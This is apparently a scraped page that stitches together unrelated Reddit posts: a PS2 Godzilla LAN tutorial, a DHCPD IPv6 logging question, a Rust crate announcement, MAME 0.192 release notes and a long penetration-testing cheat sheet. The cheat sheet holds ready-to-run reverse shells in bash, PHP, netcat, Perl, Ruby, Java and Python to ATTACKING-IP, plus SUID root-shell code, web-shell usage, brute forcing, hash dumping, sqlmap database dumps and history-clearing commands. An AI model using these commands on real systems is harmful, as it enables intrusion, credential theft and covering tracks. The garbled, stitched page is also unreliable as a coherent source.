Packet Trace Guide – Kemp Support

Written tutorial for getting Godzilla: Save the Earth online

Copy and Pasted from my txt doc
Tutorial for getting Godzilla: Save The Earth working on LAN with LogMeIn Hamachi

Programs you will need, with links provided:
Winpcap, Windip, DISCIDUTIL3.0_CD, and the dev9 gigarazi plugin are all in this link
https://forums.pcsx2.net/Thread-How-To-Play-Online-Guide
to play lan, you will need a network adapter startup disc, which I will not provide a link for, and LogMeIn Hamachi.
https://www.vpn.net/

To start, install winpcap, and then configure the DEV9 plugin in pcsx2 binaries to GiGaHeRz's DEV9 Driver 0.3.0
Then, Add DISCIDUTIL3.0_CD, and the Network Adapter Startup Disc to your ISO selector, along with your Godzilla: STE disc.

Run DISCIDUTIL3.0_CD, then swap discs to the Godzilla: STE disc, and press x, then see the disc ID, which will read 00 00 00 00 12
(or any other numbers), then run winDIP, and select the Godzilla: STE disc, and click Scan File, then Verify Version
Then enter in the disc ID, then click patch. Once that is done, click OK.


Set up Logmein Hamachi, and create a network
Go into pcsx2, and click Config, then click Plugin/BIOS Selector, then click configure next to the changed Dev9 plugin.
After clicking configure, click the checkbox under "ethernet" that says enabled, then under "Ethernet Device", click
"pcap bridge LogMeIn Inc."
Once that is done, run the Network Adapter Startup Disc, and if the option comes up, click format

Click Isp Setup, and click OK until the age comes up, then agree to the privacy policy, then enter in the info it asks for.
(not sure if the email needs to be accurate)
Once the info is put in, continue to ust click OK, then name your ISP setting, then click yes for subscribing, then click
high speed connection, then select Manual Settings.
To get your ip address, netmask, and default router address, search for "command prompt" on your pc, and open it.
Once it is opened, type "ipconfig" and the numbers that are important are the first IPv4 Address, Subnet Mask, and Default-
Gateway. In the default gateway, two strings of numbers will show up, pay attention to the second one, probably looking like
XX.X.X.X
Only pay attention to the first 3 codes requested, and if a number is a two digit or 1 digit number, have a 0 in front of it.
(so 12 being 012, etc)
Enter those in, and have someone else join your hamachi network, select Multi-player in Godzilla: STE, and select "Network Play"
Create a game on there, and if your friend is connected through Hamachi, they should be able to see it, and join.

I am creating a discord for people who want to play this game with others online, or just discuss and have fun, the discord link
will be here: YAt8MMX
submitted by RTXdestroyer to GODZILLA [link] [comments]

ISC DHCPD 4.3 IPv6 logging

We've been running DHCPD for years and just ran into a problem that has stumped me for weeks. I'm hoping there are some experts here that have overcome this issue before.
We normally log option 82 with our IPv4 clients which includes a text string from a downstream fibre to the home access node. The string is ASCII and looks something similar to: "NODE 1/1/4/1/xyz12345678"
We then log this with client.remote-id. No issues, been doing it for years.
Recently we've been working towards a general customer IPv6 dual-stack roll out. Our access gear provides the identical string as above in option 37. We use v6relay to pick out the correct string. Problem is the string comes encoded as per the RFC. Using binary-to-ascii(16,8,"", v6relay(1, option client.remote-id)) yields nothing. As a matter of fact the entire log line is skipped. I've tried some other binary to ascii options without success. If I extract the value of option 37 from a pcap (nested value 1... because the access gear + cisco router with ip helper both add option 37 values) I can see the value is encoded as hex. If I grab the value and paste it into any hex to ascii converter everything is there.
Am I missing something here with binary-to-ascii, or is this just not doable in the dhcpd config file?
E: autocorrect typo
submitted by LitreAhhCola to sysadmin [link] [comments]

Const-adventures: A port of Python's struct-module

TL;DR: restruct is a port of Python's struct module as a proc-macro, allowing to write simple parsers/writers for structured binary data.
If one needs to read or write structured binary data, the options are to either do it manually, do it semi-manually via byteorder or use a full-blown parser generator. As an intermediate solution, Python has the struct-module, which uses a small DSL to describe the exact layout of data-structures and then read/write those structures either in IO- or FFI-situations.
Proc-macros and const-functions on the rise in Rust and purely as an experiment I ported Python's struct-module to Rust as a proc-macro. The implementation derives types that can read/write binary data in the given format:
// Generate a parser in little-endian for two 32bit integers, a float and a bool. #[derive(restruct_derive::Struct)] #[fmt="<2if?"] struct FooParser; // Pack a tuple of two integers, a float an a bool into a [u8; _]-buffer. let packed = FooParser::pack((1, 2, 3.0, false)); assert_eq!(packed.len(), FooParser::SIZE); // Packing and unpacking can't fail at runtime. let unpacked = FooParser::unpack(packed); assert_eq!(unpacked, (1, 2, 3.0, false)); 
As a special quirk, the proc-macro go through great pains to make those functions const; they may, therefore, be used to initialize other constants:
#[derive(restruct_derive::Struct)] #[fmt="<2if?"] struct Tea; const TEAPOT: ::Unpacked = Tea::unpack(*include_bytes!("teapot.bin")); const TEAPOT_TEMPERATURE: i32 = TEAPOT.0; const TEAPOT_FILL_STATUS: f32 = TEAPOT.2; const TEAPOT_ACTIVE: bool = TEAPOT.3; 
Functions are also provided to interact with any std::io::Read/Write or read raw data from memory. In not-const context, packing/unpacking should almost always boil down to zero-cost.

Docs with lots of examples can be found here, an extremely small reader for Pcap-Files is found here.
The crate currently needs nightly and does some shady stuff to accomplish the above. If anyone wants to break things, feel free :-)
submitted by ebfeebfe to rust [link] [comments]

MAME 0.192

MAME 0.192

Even if you’re still feeling burned from Singles’ Day, Thanksgiving, and/or Black Friday, MAME 0.192 is here, and there’s plenty packed into this update. At long last, the MCU for Ping Pong King is simulated, making the game playable, and Flower now runs better than it ever did. Taito’s abstract maze game Marine Date is also emulated better than ever, although there are still some issues with collision detection. We’ve got newly dumped prototypes, including a prototype of Battlecry, and a more complete version of Grudge Match that appears to come from a location test in Italy. Many of the Aristocrat MK5 gambling machines have been redumped so the ROM checksums pass and they boot. Missing graphics in the Merit Megatouch games have been fixed.
But we know that rumours about the next part of this announcement have made lots of arcade fans excited: IGS PGM2 software is showing signs of life. I’m sure at least some of you are wondering how this was achieved. Usual suspects Morten Shearman Kirkegaard and Peter Wilhelmsen (recently featured here in connection to their success in dumping Gaelco protection programs) have built another FPGA-based rig that allowed them to dump the internal programs from the ARM CPUs for Oriental Legend 2 and Knights of Valour 2 New Legend. On top of this, there are some nice performance improvements to MAME’s MPEG audio decoding that should benefit other systems as well.
In computer system emulation, we’ve got a number of graphical fixes for FM Towns, heaps of improvements for the Tatung Einstein, No-Slot Clock support for the Apple //e family, and support for some Brazilian CoCo clones from Prológica and Codimex. There are some big updates to the PC software lists, too. The ACI Destiny Prodigy, Mephisto RISC 1MB and Mephisto RISC II chess computers are now working. Finally, the Interpro drivers have numerous improvements, including preliminary keyboard/video support.
That’s just scratching the surface – there are far more bug fixes, newly dumped system and performance improvements. You can get the source or Windows binaries from the download page.

MAMETesters Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

Software list items promoted to working

New NOT_WORKING software list additions

Translations added or modified

Source Changes

submitted by cuavas to emulation [link] [comments]

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usshare/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

nbtscan

nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off this inverse name lookup, for hanging resolution
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r 192.168.1.0/24 - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

SMB Enumeration

nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc

Mounting File Shares

mount 192.168.1.1:/vol/share /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 192.168.1.1 25 - telnet 192.168.1.1 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

nmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer

DNSRecon

dnsrecon -d TARGET -D /usshare/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.1 - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usshare/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX - Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25 |cut -d” “ -f4 - Enmerate users from SNMP
python /usshare/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX - Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output

Passwords

/usshare/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usshare/wordlistsnmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usshare/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usshare/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 | grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 - Use google to search exploit-db.com for exploits
grep -R "W7" /usshare/metasploit-framework /modules/exploit/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process ID's (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 - Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1 - Dig reverse lookup on an IP address.
host 192.168.1.1 - Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR - Perform a DNS zone transfer using dig.
host -l domain.com nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com - Blocks access to google.com from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "8.8.8.8" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" | chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /uslocal/bin/blah - Shows contents of none text files, e.g. whats in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
history - Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPM's on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems, you can pull #some usefull information about installed packages and #or install additional tools.

yum update - Update all RPM packages with YUM, also shows whats out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updates with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - What a packages does, e.g Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed | more - List all installed packages.
yum grouplist | more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro. Linux User Management
useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 #etc) on Linux and some other tricks for searching #inside of archives etc.

unzip archive.zip - Extracts zip file on Linux.
zipgrep *.txt archive.zip - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /valog/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r file.zip /di* - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.

Linux File Commands

df -h blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf - Remove files and directories without prompting for confirmation.

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //serveshare /mnt/win -o user=username,password=password1 $ smbclient -U user \\server\share $ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output.c input.c - Compile C code.
gcc -m32 -o output.c input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recersive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissons for details.
Clear bash history - $ ssh [email protected] | cat /dev/null > ~/.bash_history

Linux File System Permissions

777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.

Linux File System

/ - also know as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root users home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr -Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to #privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init script - worth a look to see whats installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - Users bash history log.
/valog/ - Linux system log files are typically stored here.
/vaadm/ - UNIX system log files are typically stored here.
/valog/apache2/access.log & /valog/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h - Linux exploit code

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell #as a superuser, you can update the UID / GID and shell #as required.

below are some quick copy and pate examples for #various #shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit

Setup Listening Netcat

Your remote shell will need a listening netcat instance #in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall #rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the #following:

[email protected]:~# nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 0.0.0.0 80 ...

NAT requires a port forward

If you're attacking machine is behing a NAT router, #you'll need to setup a port forward to the attacking #machines IP / Port.

ATTACKING-IP is the machine running your listening #netcat session, port 80 is used in all examples below #(for reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done

or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

!/usbin/gawk -f

BEGIN { Port = 8080 Prompt = "bkd> "
 Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } 
}

Kali Web Shells

The following shells exist within Kali Linux, under /#usshare/webshells/ these are only useful if you are #able to upload, inject or transfer the shell to the #machine.

Kali PHP Web Shells

/usshare/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usshare/webshells/php/php-findsock-shell.php
/usshare/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80
/usshare/webshells/php/simple-backdoor.php - PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usshare/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells, #however they can be useful for executing a reverse #shell.

Kali Perl Reverse Shell

/usshare/webshells/perl/perl-reverse-shell.pl - Pen Test Monkey - Perl Reverse Shell
/usshare/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usshare/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usshare/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usshare/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usshare/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell #in Linux, useful for running commands like su from #reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' - echo os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - exec "/bin/sh"; perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell - exec "/bin/sh"
Spawn Lua TTY Shell - os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi: - :!bash
Spawn TTY Shell NMAP - !sh

SSH Port Forwarding

ssh -L 9999:10.0.2.2:445 [email protected] - Port 9999 locally is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250

SSH Port Forwarding with Proxychains

ssh -D 127.0.0.1:9050 [email protected] - Dynamically allows all port forwards to the subnets availble on the target.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpretereverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp set ViewOnly false - Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpretereverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file - c:\windows
Meterpreter upload file to Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - execute -f c:\windows\temp\exploit.exe
Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts priviledge escalation the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target - Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scannehttp/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scannehttp/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scannemssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scannemysql/mysql_version - Metasploit MSSQL Version Scanner
use auxiliary/scanneoracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gathewin_privs - Metasploit show privileges of current user
use post/windows/gathecredentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasplit load Mimikatz
run post/windows/gathelocal_admin_search_enum - Idenitfy other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for, configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 - Add ip to fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 - Add ip to fa0/0
(config-if)# line vty 0 4 - Configure vty line
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show sartup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

dir file systems - Show available files

dir all-filesystems - File information

dir /all - SHow deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copys running config to tftp server

copy running-config startup-config - Copy startup-config to running-config

Cryptography

Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes

SQLMap Examples

sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/vawww/blah.php" - Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to Kalilinux [link] [comments]

MAME 0.192

MAME 0.192

